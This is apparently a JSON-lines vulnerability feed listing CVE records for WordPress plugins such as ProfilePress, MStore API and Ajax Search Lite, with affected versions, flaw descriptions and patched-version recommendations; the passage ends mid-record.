{"CVE_ID":"CVE-2025-1620","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/923db805-92e7-4489-8e57-374a19f817d7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/923db805-92e7-4489-8e57-374a19f817d7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1619","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae9bc19d-1634-4501-a258-8c56b2afee88\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae9bc19d-1634-4501-a258-8c56b2afee88\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2205","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance \u2013 Cookie Banner, Cookie Consent, Cookie Notice \u2013 CCPA, DSGVO, RGPD plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.15.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-1622\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-1622\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a903d61-2792-4fe0-a26b-f400f4a3124b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a903d61-2792-4fe0-a26b-f400f4a3124b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37da32e4-48a1-4830-a47c-c454d60c9811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37da32e4-48a1-4830-a47c-c454d60c9811?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2867","slug":"wp-user-avatar","versionImpact":"4.15.4","versionEndExcluding":"4.15.5","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 parameter in all versions up to, and including, 4.15.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.15.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eb296af-547a-44aa-b804-833204b75256?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eb296af-547a-44aa-b804-833204b75256?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3061186%40wp-user-avatar%2Ftrunk&old=3053353%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3061186%40wp-user-avatar%2Ftrunk&old=3053353%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8269","slug":"mstore-api","versionImpact":"4.15.3","versionEndExcluding":"4.15.4","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 4.15.3. This is due to the plugin not checking that user registration is enabled prior to creating a user account through the register() function. This makes it possible for unauthenticated attackers to create user accounts on sites, even when user registration is disabled and plugin functionality is not activated.","recommendation":"Update to version 4.15.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59c5b6e7-74b0-430d-8b4a-5a42220f3ec9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59c5b6e7-74b0-430d-8b4a-5a42220f3ec9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.2\\\/controllers\\\/flutter-user.php#L406\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.2\\\/controllers\\\/flutter-user.php#L406\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.2\\\/controllers\\\/flutter-user.php#L454\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.2\\\/controllers\\\/flutter-user.php#L454\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8242","slug":"mstore-api","versionImpact":"4.15.3","versionEndExcluding":"4.15.4","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_user_profile() function in all versions up to, and including, 4.15.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files (not including PHP files) on the affected site's server which may make remote code execution possible. This can be paired with a registration endpoint for unauthenticated users to exploit the issue.","recommendation":"Update to version 4.15.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe3834a6-a6f5-4cc7-951e-a6ada6346b07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe3834a6-a6f5-4cc7-951e-a6ada6346b07?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L1053\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L1053\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/functions\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/functions\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1535","slug":"wp-user-avatar","versionImpact":"4.15.2","versionEndExcluding":"4.15.3","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.15.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38ec1a6b-f5ee-446a-9e6c-3485dafb85ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38ec1a6b-f5ee-446a-9e6c-3485dafb85ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php#L952\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php#L952\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047008\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047008\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7628","slug":"mstore-api","versionImpact":"4.15.2","versionEndExcluding":"4.15.3","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 4.15.2. This is due to the use of loose comparison in the 'verify_id_token' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to an @flutter.io email address or phone number. This also requires firebase to be configured on the website and the user to have set up firebase for their account.","recommendation":"Update to version 4.15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d174f856-d94a-42ed-b547-67699e175cd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d174f856-d94a-42ed-b547-67699e175cd8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3134553%40mstore-api&new=3134553%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3134553%40mstore-api&new=3134553%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13121","slug":"wp-user-avatar","versionImpact":"4.15.19","versionEndExcluding":"4.15.20","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59ee8fe5-4820-4d52-b17a-7044631c40c1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59ee8fe5-4820-4d52-b17a-7044631c40c1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13120","slug":"wp-user-avatar","versionImpact":"4.15.19","versionEndExcluding":"4.15.20","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b70798c-c30d-42e6-ac72-821c5568b9b5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b70798c-c30d-42e6-ac72-821c5568b9b5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13119","slug":"wp-user-avatar","versionImpact":"4.15.19","versionEndExcluding":"4.15.20","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32600a45-a8cd-446c-9aa2-0621a02a9754\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32600a45-a8cd-446c-9aa2-0621a02a9754\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11083","slug":"wp-user-avatar","versionImpact":"4.15.18","versionEndExcluding":"4.15.19","description":"The ProfilePress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.15.18 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 4.15.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197296\\\/wp-user-avatar\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197296\\\/wp-user-avatar\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60c8159f-0641-4b75-9d56-34bd13105caf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60c8159f-0641-4b75-9d56-34bd13105caf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10518","slug":"wp-user-avatar","versionImpact":"4.15.14","versionEndExcluding":"4.15.15","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.15 does not sanitise and escape some of its Membership Plan settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1e5ad16-6240-4920-888a-36fbac22cc71\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1e5ad16-6240-4920-888a-36fbac22cc71\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10517","slug":"wp-user-avatar","versionImpact":"4.15.14","versionEndExcluding":"4.15.15","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.15 does not sanitise and escape some of its Drag & Drop Builder fields, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7c3a990-458e-4e15-b427-0b37de120740\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7c3a990-458e-4e15-b427-0b37de120740\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1409","slug":"wp-user-avatar","versionImpact":"4.15.0","versionEndExcluding":"4.15.1","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [reg-select-role] shortcode in all versions up to, and including, 4.15.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.15.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53e16bca-7c85-4d56-8233-b3b53f793b39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53e16bca-7c85-4d56-8233-b3b53f793b39?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038677%40wp-user-avatar&new=3038677%40wp-user-avatar&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038677%40wp-user-avatar&new=3038677%40wp-user-avatar&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6328","slug":"mstore-api","versionImpact":"4.14.7","versionEndExcluding":"4.15.0","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.14.7. This is due to insufficient verification on the 'phone' parameter of the 'firebase_sms_login' and 'firebase_sms_login_v2' functions. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email address or phone number.  Additionally, if a new email address is supplied, a new user account is created with the default role, even if registration is disabled.","recommendation":"Update to version 4.15.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17d8e2e9-5e3f-433b-be1a-6ea765eba547?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17d8e2e9-5e3f-433b-be1a-6ea765eba547?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L699\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L699\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L714\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L714\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115231\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115231\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1046","slug":"wp-user-avatar","versionImpact":"4.14.3","versionEndExcluding":"4.14.4","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin 'reg-number-field' shortcode in all versions up to, and including, 4.14.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.14.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030229\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030229\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0870","slug":"yith-woocommerce-gift-cards","versionImpact":"4.12.0","versionEndExcluding":"4.13.0","description":"The YITH WooCommerce Gift Cards plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_mail_status' and 'save_email_settings' functions in all versions up to, and including, 4.12.0. This makes it possible for unauthenticated attackers to modify WooCommerce settings.","recommendation":"Update to version 4.13.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084519\\\/yith-woocommerce-gift-cards\\\/trunk\\\/includes\\\/admin\\\/class-ywgc-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084519\\\/yith-woocommerce-gift-cards\\\/trunk\\\/includes\\\/admin\\\/class-ywgc-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4013","slug":"gdpr-cookie-compliance","versionEndExcluding":"4.12.5","description":"The GDPR Cookie Compliance (CCPA, DSGVO, Cookie Consent) WordPress plugin before 4.12.5 does not have proper CSRF checks when managing its license, which could allow attackers to make logged in admins update and deactivate the plugin's license via CSRF attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54e4494c-a280-4d91-803d-7d55159cdbc5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54e4494c-a280-4d91-803d-7d55159cdbc5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13585","slug":"ajax-search-lite","versionImpact":"4.12.4","versionEndExcluding":"4.12.5","description":"The Ajax Search Lite  WordPress plugin before 4.12.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.12.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/270f213a-2fde-471c-ad09-2b44d11891ec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/270f213a-2fde-471c-ad09-2b44d11891ec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10568","slug":"ajax-search-lite","versionImpact":"4.12.3","versionEndExcluding":"4.12.4","description":"The Ajax Search Lite  WordPress plugin before 4.12.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1676aef0-be5d-4335-933d-dc0d54416fd4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1676aef0-be5d-4335-933d-dc0d54416fd4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0212","slug":"cloudflare","versionImpact":"4.12.2","versionEndExcluding":"4.12.3","description":"The Cloudflare Wordpress plugin was found to be vulnerable to improper authentication. The vulnerability enables attackers with a lower privileged account to access data from the Cloudflare API.\n","recommendation":"Update to version 4.12.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/cloudflare\\\/Cloudflare-WordPress\\\/security\\\/advisories\\\/GHSA-h2fj-7r3m-7gf2\",\"name\":\"https:\\\/\\\/github.com\\\/cloudflare\\\/Cloudflare-WordPress\\\/security\\\/advisories\\\/GHSA-h2fj-7r3m-7gf2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/cloudflare\\\/Cloudflare-WordPress\\\/releases\\\/tag\\\/v4.12.3\",\"name\":\"https:\\\/\\\/github.com\\\/cloudflare\\\/Cloudflare-WordPress\\\/releases\\\/tag\\\/v4.12.3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8619","slug":"ajax-search-lite","versionImpact":"4.12.1","versionEndExcluding":"4.12.2","description":"The Ajax Search Lite  WordPress plugin before 4.12.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84f6733e-028a-4288-b01a-7578a4a89dbe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84f6733e-028a-4288-b01a-7578a4a89dbe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7084","slug":"ajax-search-lite","versionImpact":"4.12","versionEndExcluding":"4.12.1","description":"The Ajax Search Lite WordPress plugin before 4.12.1 does not sanitise and escape some parameters, which could allow users with a role as low as Admin+ to perform Cross-Site Scripting attacks.","recommendation":"Update to version 4.12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d38bf4d-de6a-49f8-be69-fa483fa61bb7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d38bf4d-de6a-49f8-be69-fa483fa61bb7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0617","slug":"woo-product-category-discount","versionImpact":"4.11","versionEndExcluding":"4.12","description":"The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue.","recommendation":"Update to version 4.12, or a newer patched 